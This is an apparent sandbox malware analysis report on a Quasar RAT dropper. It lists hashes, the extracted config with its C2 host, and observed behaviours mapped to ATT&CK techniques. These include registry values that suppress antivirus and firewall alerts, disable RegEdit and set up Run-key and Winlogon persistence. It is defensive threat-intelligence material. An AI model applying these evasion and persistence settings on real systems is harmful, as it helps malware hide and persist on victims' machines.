quasar | 7975eec3959bed57e86fb6fa917503a7a1242fdf589dde7600783fc37d3dfbde

Analysis

max time kernel
1199s
max time network
1171s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
23-05-2024 14:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lol.exe
Size

13.1MB
MD5

621d4a616715d165ed2c10e48e5fd94b
SHA1

7fabfdb5167e59d0442df460e1b236cb5bc75fbe
SHA256

7975eec3959bed57e86fb6fa917503a7a1242fdf589dde7600783fc37d3dfbde
SHA512

793302845e76e8cc03bd8281abad4db786f361e5c1a691462b40da11e8e7ac6210e0e9c21b41493dedffc6724af146ef70b9f8448d51dc860725364e14cba442
SSDEEP

196608:tbVYKe7PjQhn5EQ9hNQAYzA5k6cTWDn7JKObS09Vp7j1oTeBI7lm:pzuA5EWheYkv8LlCTe2s

Score

10^/10

quasar romka discovery evasion execution persistence spyware stealer trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes

encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
install_name
Romilyaa.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows 10 Boot
subdirectory
SubDir

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	whkszztakb.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	whkszztakb.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000100000002a9f3-2268.dat	family_quasar
behavioral1/memory/5348-2333-0x0000000000DB0000-0x00000000010D4000-memory.dmp	family_quasar

Windows security bypass 2 TTPs 5 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	whkszztakb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	whkszztakb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	whkszztakb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	whkszztakb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	whkszztakb.exe

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	whkszztakb.exe

.NET Reactor proctector 35 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/1156-39-0x0000000005F20000-0x0000000006470000-memory.dmp	net_reactor
behavioral1/memory/1156-40-0x0000000006A20000-0x0000000006F6E000-memory.dmp	net_reactor
behavioral1/memory/1156-47-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-58-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-60-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-71-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-76-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-84-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-86-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-103-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-108-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-109-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-113-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-111-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-105-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-101-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-99-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-97-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-95-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-93-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-91-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-88-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-82-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-80-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-78-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-74-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-72-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-67-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-68-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-62-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-64-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-51-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-49-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-44-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor
behavioral1/memory/1156-43-0x0000000006A20000-0x0000000006F69000-memory.dmp	net_reactor

Executes dropped EXE 11 IoCs

pid	Process
3772	loader.exe
1156	Rover.exe
5348	scary.exe
5472	the.exe
5864	ac3.exe
836	jaffa.exe
5392	whkszztakb.exe
3460	ztmpxseewjrualr.exe
5752	vbsnimmo.exe
5704	shilkiszkvwxo.exe
5968	vbsnimmo.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6040	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	whkszztakb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirstRunDisabled = "1"	whkszztakb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	whkszztakb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	whkszztakb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	whkszztakb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	whkszztakb.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\gkpojifc = "whkszztakb.exe"	ztmpxseewjrualr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sbpbmulj = "ztmpxseewjrualr.exe"	ztmpxseewjrualr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "shilkiszkvwxo.exe"	ztmpxseewjrualr.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\u:	whkszztakb.exe
File opened (read-only)	\??\v:	whkszztakb.exe
File opened (read-only)	\??\g:	vbsnimmo.exe
File opened (read-only)	\??\k:	vbsnimmo.exe
File opened (read-only)	\??\m:	vbsnimmo.exe
File opened (read-only)	\??\g:	whkszztakb.exe
File opened (read-only)	\??\o:	whkszztakb.exe
File opened (read-only)	\??\q:	whkszztakb.exe
File opened (read-only)	\??\x:	vbsnimmo.exe
File opened (read-only)	\??\t:	vbsnimmo.exe
File opened (read-only)	\??\w:	whkszztakb.exe
File opened (read-only)	\??\j:	vbsnimmo.exe
File opened (read-only)	\??\q:	vbsnimmo.exe
File opened (read-only)	\??\r:	whkszztakb.exe
File opened (read-only)	\??\x:	whkszztakb.exe
File opened (read-only)	\??\n:	vbsnimmo.exe
File opened (read-only)	\??\q:	vbsnimmo.exe
File opened (read-only)	\??\e:	vbsnimmo.exe
File opened (read-only)	\??\i:	vbsnimmo.exe
File opened (read-only)	\??\n:	vbsnimmo.exe
File opened (read-only)	\??\x:	vbsnimmo.exe
File opened (read-only)	\??\w:	vbsnimmo.exe
File opened (read-only)	\??\h:	vbsnimmo.exe
File opened (read-only)	\??\g:	vbsnimmo.exe
File opened (read-only)	\??\y:	vbsnimmo.exe
File opened (read-only)	\??\a:	vbsnimmo.exe
File opened (read-only)	\??\s:	vbsnimmo.exe
File opened (read-only)	\??\s:	whkszztakb.exe
File opened (read-only)	\??\p:	vbsnimmo.exe
File opened (read-only)	\??\r:	vbsnimmo.exe
File opened (read-only)	\??\v:	vbsnimmo.exe
File opened (read-only)	\??\o:	vbsnimmo.exe
File opened (read-only)	\??\l:	whkszztakb.exe
File opened (read-only)	\??\u:	vbsnimmo.exe
File opened (read-only)	\??\v:	vbsnimmo.exe
File opened (read-only)	\??\z:	vbsnimmo.exe
File opened (read-only)	\??\i:	whkszztakb.exe
File opened (read-only)	\??\b:	vbsnimmo.exe
File opened (read-only)	\??\k:	vbsnimmo.exe
File opened (read-only)	\??\w:	vbsnimmo.exe
File opened (read-only)	\??\b:	vbsnimmo.exe
File opened (read-only)	\??\k:	whkszztakb.exe
File opened (read-only)	\??\p:	vbsnimmo.exe
File opened (read-only)	\??\s:	vbsnimmo.exe
File opened (read-only)	\??\t:	vbsnimmo.exe
File opened (read-only)	\??\a:	whkszztakb.exe
File opened (read-only)	\??\b:	whkszztakb.exe
File opened (read-only)	\??\h:	whkszztakb.exe
File opened (read-only)	\??\t:	whkszztakb.exe
File opened (read-only)	\??\e:	vbsnimmo.exe
File opened (read-only)	\??\l:	vbsnimmo.exe
File opened (read-only)	\??\m:	whkszztakb.exe
File opened (read-only)	\??\n:	whkszztakb.exe
File opened (read-only)	\??\p:	whkszztakb.exe
File opened (read-only)	\??\y:	whkszztakb.exe
File opened (read-only)	\??\o:	vbsnimmo.exe
File opened (read-only)	\??\u:	vbsnimmo.exe
File opened (read-only)	\??\j:	vbsnimmo.exe
File opened (read-only)	\??\l:	vbsnimmo.exe
File opened (read-only)	\??\e:	whkszztakb.exe
File opened (read-only)	\??\j:	whkszztakb.exe
File opened (read-only)	\??\z:	whkszztakb.exe
File opened (read-only)	\??\h:	vbsnimmo.exe
File opened (read-only)	\??\r:	vbsnimmo.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0"	whkszztakb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197"	whkszztakb.exe

AutoIT Executable 10 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000100000002a9ea-3043.dat	autoit_exe
behavioral1/files/0x000100000002a9ec-3088.dat	autoit_exe
behavioral1/files/0x000100000002aa67-3098.dat	autoit_exe
behavioral1/files/0x000200000002aa66-3108.dat	autoit_exe
behavioral1/files/0x000100000002aa68-3116.dat	autoit_exe
behavioral1/files/0x000100000002aa69-3119.dat	autoit_exe
behavioral1/files/0x000100000002aa7d-3161.dat	autoit_exe
behavioral1/files/0x000100000002aa7e-3163.dat	autoit_exe
behavioral1/files/0x000100000002aa89-3201.dat	autoit_exe
behavioral1/files/0x000100000002aa89-3211.dat	autoit_exe

Drops file in System32 directory 12 IoCs

description	ioc	Process
File opened for modification	\??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe	vbsnimmo.exe
File opened for modification	\??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe	vbsnimmo.exe
File opened for modification	C:\Windows\SysWOW64\whkszztakb.exe	jaffa.exe
File created	C:\Windows\SysWOW64\vbsnimmo.exe	jaffa.exe
File created	C:\Windows\SysWOW64\shilkiszkvwxo.exe	jaffa.exe
File opened for modification	C:\Windows\SysWOW64\shilkiszkvwxo.exe	jaffa.exe
File opened for modification	C:\Windows\SysWOW64\msvbvm60.dll	whkszztakb.exe
File created	\??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe	vbsnimmo.exe
File created	C:\Windows\SysWOW64\whkszztakb.exe	jaffa.exe
File created	C:\Windows\SysWOW64\ztmpxseewjrualr.exe	jaffa.exe
File opened for modification	C:\Windows\SysWOW64\ztmpxseewjrualr.exe	jaffa.exe
File opened for modification	C:\Windows\SysWOW64\vbsnimmo.exe	jaffa.exe

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\SubDir\Romilyaa.exe	scary.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.nal	vbsnimmo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe	vbsnimmo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe	vbsnimmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe	vbsnimmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.nal	vbsnimmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.nal	vbsnimmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe	vbsnimmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.nal	vbsnimmo.exe
File created	\??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe	vbsnimmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe	vbsnimmo.exe
File created	C:\Program Files\SubDir\Romilyaa.exe	scary.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe	vbsnimmo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe	vbsnimmo.exe
File created	\??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe	vbsnimmo.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe	vbsnimmo.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File created	C:\Windows\~$mydoc.rtf	WINWORD.EXE
File opened for modification	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_094337207a9adec3\MsoIrmProtector.doc.exe	vbsnimmo.exe
File opened for modification	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_1397e172aefba0be\MsoIrmProtector.doc.exe	vbsnimmo.exe
File opened for modification	C:\Windows\mydoc.rtf	jaffa.exe
File opened for modification	C:\Windows\mydoc.rtf	WINWORD.EXE
File created	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_094337207a9adec3\MsoIrmProtector.doc.exe	vbsnimmo.exe
File created	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_094337207a9adec3\MsoIrmProtector.doc.exe	vbsnimmo.exe
File opened for modification	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_094337207a9adec3\MsoIrmProtector.doc.exe	vbsnimmo.exe
File created	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_1397e172aefba0be\MsoIrmProtector.doc.exe	vbsnimmo.exe
File created	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_1397e172aefba0be\MsoIrmProtector.doc.exe	vbsnimmo.exe
File opened for modification	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.22000.318_none_1397e172aefba0be\MsoIrmProtector.doc.exe	vbsnimmo.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2160	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WINWORD.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2452	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
3124	timeout.exe
5600	timeout.exe
4652	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Kills process with taskkill 4 IoCs

evasion

pid	Process
4072	taskkill.exe
5512	taskkill.exe
5728	taskkill.exe
5340	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 29 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31108500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "3548363617"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0"	iexplore.exe

Modifies registry class 21 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.wsf	whkszztakb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com2 = "6BBFF9B0F960F29984783A42869E3994B38802FE4211023CE1CF42EC09A8"	jaffa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com4 = "7F8BFF8F4829851D9133D72E7E96BCE7E146584166406236D79B"	jaffa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	whkszztakb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg	whkszztakb.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLV.Classes	jaffa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com3 = "2EB6B128449439EC53BEBAA63298D7C9"	jaffa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom1 = "E7F66BC5FF1F21AED27AD0A78A7F9110"	jaffa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom2 = "193AC60814E2DAC0B8C97FE1ED9234BC"	jaffa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	whkszztakb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.wsc\ = "txtfile"	whkszztakb.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com1 = "32442C0B9C2282256D3677A177222CDF7D8564DB"	jaffa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.wsh	whkszztakb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.WSH\ = "txtfile"	whkszztakb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.wsc	whkszztakb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.WSF\ = "txtfile"	whkszztakb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs	whkszztakb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	whkszztakb.exe
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings	jaffa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat	whkszztakb.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
5636	WINWORD.EXE
5636	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4496	msedge.exe
4496	msedge.exe
4584	msedge.exe
4584	msedge.exe
5092	msedge.exe
5092	msedge.exe
1388	identity_helper.exe
1388	identity_helper.exe
2160	powershell.exe
2160	powershell.exe
2160	powershell.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
3460	ztmpxseewjrualr.exe
